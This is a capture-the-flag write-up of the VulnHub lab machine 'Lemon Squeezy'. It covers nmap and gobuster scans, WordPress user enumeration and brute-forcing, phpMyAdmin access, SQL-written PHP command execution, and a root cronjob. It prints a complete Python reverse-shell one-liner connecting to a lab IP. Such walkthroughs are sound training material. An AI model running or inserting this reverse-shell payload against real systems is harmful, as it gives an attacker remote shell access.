CTF-Writeups/VulnHub/LemonSqueezy.md
2021-01-25 06:47:50 +05:00

2.5 KiB

VulnHub-Lemon Squeezy

NMAP

nmap -sC -sV 172.16.6.128
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-25 05:47 PKT
Nmap scan report for 172.16.6.128
Host is up (0.00026s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:BF:8A:DB (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds

PORT 80

Running gobuster

We see that there's a wordpress directory and if you visit it css would not be rendered properly because it is using the domain name lemonsqueezy so put it in the /etc/hosts file

Since this is a wordpress site we can use wpscan to look for users

Bruteforcing against these users

We know that there's another usernamed lemon maybe this is his passowrd for wordpress or phpmyadmin so let's try logging in with this

This was the password for orange to phpmyadmin

Insert a simple GET paramter php code to execute system commands through SQL

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Through this payload we get a reverse shell and I stabilized it with by spawning a shell with python also I looked at cronjobs running and there is a script running as root

This didnt work so I used the python reverse shell payload again